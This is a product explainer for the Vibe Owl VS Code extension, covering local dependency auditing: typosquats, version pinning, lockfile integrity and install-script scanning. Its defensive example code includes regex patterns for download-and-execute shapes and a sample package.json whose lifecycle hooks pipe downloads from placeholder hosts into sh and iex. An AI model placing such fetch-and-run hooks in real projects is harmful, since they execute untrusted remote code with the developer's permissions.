Dependency Security in VS Code: How to Audit Package Risks Locally

Why Does Dependency Security Matter for Developers?

Dependency security matters because modern applications rely on hundreds of third-party packages, each representing a potential attack vector. Supply chain attacks through typosquatted packages, malicious install scripts, and compromised maintainer accounts have increased significantly, making local dependency auditing essential for every project.

A typical Node.js application installs 200–800 packages through transitive dependencies. Each package can execute arbitrary code during installation through lifecycle scripts. A single compromised package in the dependency tree can steal credentials, exfiltrate source code, or install backdoors on the developer's machine.

AI coding tools amplify dependency risk. Cursor and Copilot suggest npm install commands for packages the developer has never evaluated. The vibe coding workflow prioritizes speed, which means dependency suggestions are accepted without the security review that would catch a typosquatted name or an unnecessary install script.

What Dependency Ecosystems Does Vibe Owl Support?

Vibe Owl audits dependency manifests across six ecosystems: npm (package.json, package-lock.json), Python (requirements.txt, pyproject.toml), Go (go.mod), Rust (Cargo.toml), Java (pom.xml, build.gradle, build.gradle.kts), and Swift (Package.swift).

Each manifest file is parsed and checked against six risk categories: non-registry sources, typosquatted names, unpinned versions, dangerous install scripts, lockfile issues, and missing integrity hashes. These six checks run entirely on the local manifest and lockfile contents, without calling any external package registry API.

The Vibe Owl: Run Dependency Risk Guard command scans every manifest file in the workspace and produces a consolidated report with findings grouped by category and severity. Each scan reports at most 120 findings.

How Does Typosquat Detection Work?

Vibe Owl detects typosquatted packages by calculating Levenshtein distance between declared package names and known popular packages. Package names within edit distance 1 of popular packages are flagged as potential typosquats at medium severity, catching common attack vectors like loadsh instead of lodash.

Typosquatting attacks register package names that differ from popular packages by one character: a transposition, insertion, deletion, or substitution. Developers who mistype a package name during npm install inadvertently install the attacker's package, which may contain data exfiltration code in its install script.

Vibe Owl computes Levenshtein distance against a maintained list of popular packages. A package named axois (instead of axios) or reqeusts (instead of requests) triggers a medium-severity finding that suggests the correct package name.
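The check described above, as an added example in plain JavaScript (not Vibe Owl's code). It assumes a constructed six-name popular list and uses the optimal string alignment distance, which counts an adjacent transposition as one edit; under plain Levenshtein, loadsh vs lodash would score 2, so that choice is what puts the page's three examples at distance 1.

```javascript
// Added example (not Vibe Owl's code): flag dependency names within one edit of a
// popular package. Optimal string alignment distance = Levenshtein plus adjacent
// transposition, so "loadsh" vs "lodash" costs 1 rather than 2.
function osaDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(
        d[i - 1][j] + 1,        // deletion
        d[i][j - 1] + 1,        // insertion
        d[i - 1][j - 1] + cost, // substitution
      );
      // Adjacent transposition (ab -> ba) counts as a single edit.
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Constructed, deliberately short list; a real scanner ships a maintained one.
const POPULAR = ['lodash', 'axios', 'express', 'react', 'requests', 'chalk'];

// One medium finding per declared name that sits at distance 1 from a popular
// package without being that package. Exact matches are never flagged.
function findTyposquats(declaredNames, popular = POPULAR) {
  const findings = [];
  for (const name of declaredNames) {
    const lower = name.toLowerCase();
    if (popular.includes(lower)) continue;      // legitimate dependency
    for (const target of popular) {
      if (osaDistance(lower, target) === 1) {
        findings.push({ package: name, suggestion: target, severity: 'medium' });
        break;                                  // one suggestion is enough
      }
    }
  }
  return findings;
}

// Constructed dependency list: legitimate, typosquat-like and unrelated names.
const SAMPLE_NAMES = ['loadsh', 'axois', 'express', 'reqeusts', 'my-internal-lib'];
```

Short names are the weak spot of a distance-1 rule: reach and react are also one edit apart, so a real list is normally paired with an allow-list of known-good names.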

What Version Pinning Issues Does Vibe Owl Detect?

Vibe Owl detects unpinned versions using * or latest, wildcard versions with x placeholders, broad range specifiers like >= and ||, and caret ranges on zero-major versions (^0.x) where minor updates can contain breaking or malicious changes.

Wildcard versions (*) allow any version to be installed, including versions published by an attacker who has compromised the package. The latest tag resolves dynamically and can change without notice. Caret ranges on ^0.x packages are particularly dangerous because semantic versioning treats 0.x releases as unstable, so a minor version bump can contain breaking changes.

Lockfile analysis supplements the version checks. Vibe Owl detects a missing lockfile when a manifest exists, multiple lockfiles in the same directory (indicating build tool confusion), the outdated npm v1 lockfile format, and missing integrity hashes. When more than 35% of packages lack integrity hashes the finding is medium severity; above 70% it is high.
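Added example (not Vibe Owl's code): the version specifier checks from the two paragraphs above plus the lockfile integrity ratio, run over a constructed package.json dependency map and a constructed lockfileVersion 3 fragment whose sha512 values are placeholders.

```javascript
// Added example (not Vibe Owl's code): flag npm version specifiers that let a
// resolution drift to a release the developer never reviewed.
function checkVersionSpec(name, spec) {
  const s = spec.trim();
  let issue = null;
  if (s === '' || s === '*' || s === 'latest') issue = 'unpinned: any version may be installed';
  else if (/(^|\.)[xX*](\.|$)/.test(s)) issue = 'wildcard placeholder (1.x, 1.2.x)';
  else if (/>=|\|\|/.test(s)) issue = 'broad range specifier (>= or ||)';
  else if (/^\^0\./.test(s)) issue = 'caret range on a zero-major version';
  return issue ? { package: name, spec, issue } : null; // null: exact pin or narrow range
}
function auditDependencies(deps) {
  return Object.entries(deps).map(([n, s]) => checkVersionSpec(n, s)).filter(Boolean);
}

// Share of lockfile entries with no integrity hash, mapped to the thresholds in the
// text (>35% medium, >70% high). Reads the lockfileVersion 2/3 "packages" map; the
// root entry and workspace links carry no hash by design and are left out.
function integrityCoverage(lock) {
  const entries = Object.entries(lock.packages || {}).filter(([p, m]) => p !== '' && !m.link);
  const missing = entries.filter(([, meta]) => !meta.integrity).length;
  const ratio = entries.length ? missing / entries.length : 0;
  const severity = ratio > 0.7 ? 'high' : ratio > 0.35 ? 'medium' : 'none';
  return { total: entries.length, missing, ratio, severity };
}

// Constructed manifest fragment mixing exact pins and risky specifiers.
const SAMPLE_DEPS = {
  express: '4.18.2',            // exact pin, not flagged
  lodash: '*',
  chalk: 'latest',
  debug: '4.x',
  semver: '>=7.0.0',
  yargs: '^17.0.0 || ^16.0.0',
  'left-pad': '^0.3.1',
  uuid: '~9.0.0',               // tilde range, outside these checks
};

// Constructed lockfile fragment; the sha512 values are placeholders, not real hashes.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app' },
    'node_modules/express': { version: '4.18.2', integrity: 'sha512-PLACEHOLDER1' },
    'node_modules/lodash': { version: '4.17.21' },
    'node_modules/chalk': { version: '5.3.0' },
    'node_modules/debug': { version: '4.3.4', integrity: 'sha512-PLACEHOLDER2' },
    'packages/internal': { link: true, resolved: 'packages/internal' },
  },
};
```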

How Does Install Script Detection Protect Against Supply Chain Attacks?

Vibe Owl scans package manifests for lifecycle scripts containing dangerous patterns: curl | bash, wget | bash, and PowerShell download-and-execute patterns. These script patterns execute arbitrary remote code during package installation, representing the primary vector for npm and pip supply chain attacks.

Package install scripts run with the developer's full system permissions. A malicious postinstall script in package.json can read SSH keys, steal environment variables, and install persistent backdoors. Vibe Owl flags these patterns at high severity regardless of the package's popularity.
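Added example (not Vibe Owl's code): a lifecycle-script scanner for the download-and-execute shapes named above, run over a constructed package.json whose URLs use the reserved .invalid TLD. The hook list and the regexes are my assumptions about what such a check covers.

```javascript
// Added example (not Vibe Owl's code): flag npm lifecycle scripts that fetch remote
// code and hand it straight to an interpreter during install.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Each entry is one download-and-execute shape. Matching is case-insensitive; the
// [^|;&]* and [^;]* runs keep a match inside a single command of a && or ; chain.
const REMOTE_EXEC_PATTERNS = [
  { id: 'curl-pipe-shell', re: /\bcurl\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b/i },
  { id: 'wget-pipe-shell', re: /\bwget\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b/i },
  { id: 'powershell-download-pipe-exec',
    re: /\b(Invoke-WebRequest|iwr|irm|Invoke-RestMethod|DownloadString)\b[^;]*\|\s*(iex|Invoke-Expression)\b/i },
  { id: 'powershell-exec-download',
    re: /\b(iex|Invoke-Expression)\b[^;]*\b(Invoke-WebRequest|iwr|irm|Invoke-RestMethod|DownloadString)\b/i },
];

// One high-severity finding per lifecycle hook whose command matches a pattern.
// Non-lifecycle scripts (build, test) never run on `npm install`, so they are
// skipped even when they contain the same shape.
function scanInstallScripts(pkg) {
  const findings = [];
  for (const [hook, cmd] of Object.entries(pkg.scripts || {})) {
    if (!LIFECYCLE_HOOKS.includes(hook)) continue;
    const hit = REMOTE_EXEC_PATTERNS.find(({ re }) => re.test(cmd));
    if (hit) findings.push({ package: pkg.name, hook, pattern: hit.id, severity: 'high' });
  }
  return findings;
}

// Constructed manifest; the URLs use the reserved .invalid TLD and resolve to nothing.
const SAMPLE_PKG = {
  name: 'demo-app',
  scripts: {
    build: 'tsc -p .',
    test: 'curl -s https://ci.example.invalid/report | bash',   // not a lifecycle hook
    preinstall: 'node -e "console.log(process.platform)"',       // runs code, but local
    postinstall: 'node scripts/patch.js && curl -fsSL https://cdn.example.invalid/setup.sh | sh',
    prepare: 'powershell -c "iwr https://cdn.example.invalid/s.ps1 | iex"',
  },
};
```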

Pro-tier dependency intelligence extends these checks with signals for dependency surface concentration (90+ packages triggers medium, 180+ triggers high), prerelease version usage, install-script exposure ratios, deprecated package counts, and major-zero version concentration. The NPM supply chain attack prevention page covers the full scope of these signals and how they combine to detect sophisticated package-based attacks.

AI coding assistants introduce an additional risk that traditional scanning misses. When Cursor or ChatGPT suggests a package name that does not exist on any registry, attackers can claim that name and publish a malicious payload under it. AI dependency hallucination detection in Vibe Owl verifies every npm and PyPI package against live registries, flagging non-existent packages as Critical and newly published packages as High before any install command runs.

How Does Dependency Scanning Integrate with the Preflight Check?

Dependency scanning feeds into the preflight check as one of five independent modules. High or critical dependency findings cause the preflight to fail. Medium findings cause a warning. The preflight consolidates dependency risk alongside code safety, diff risk, git history, and env hygiene into a single PASS/FAIL gate.

The preflight check provides a single command that covers the entire security surface. A developer preparing to push code receives a consolidated result that includes dependency risk status alongside code findings and git safety. The VS Code security extension treats dependency risk as equally important to secret detection because supply chain attacks can compromise an entire project through a single package.

The workspace health score deducts points for dependency findings: 18 points per critical finding, 10 per high, 4 per medium, and 1 per low. Dependency risk directly affects the project's overall security rating and trend tracking.

Marcel Iseli

Founder of Vibe Owl · Software Developer

LinkedIn ↗

Marcel Iseli is a software developer and the creator of Vibe Owl. He built the extension after exposing his own API keys during an early vibe coding session and decided the tooling gap was worth fixing.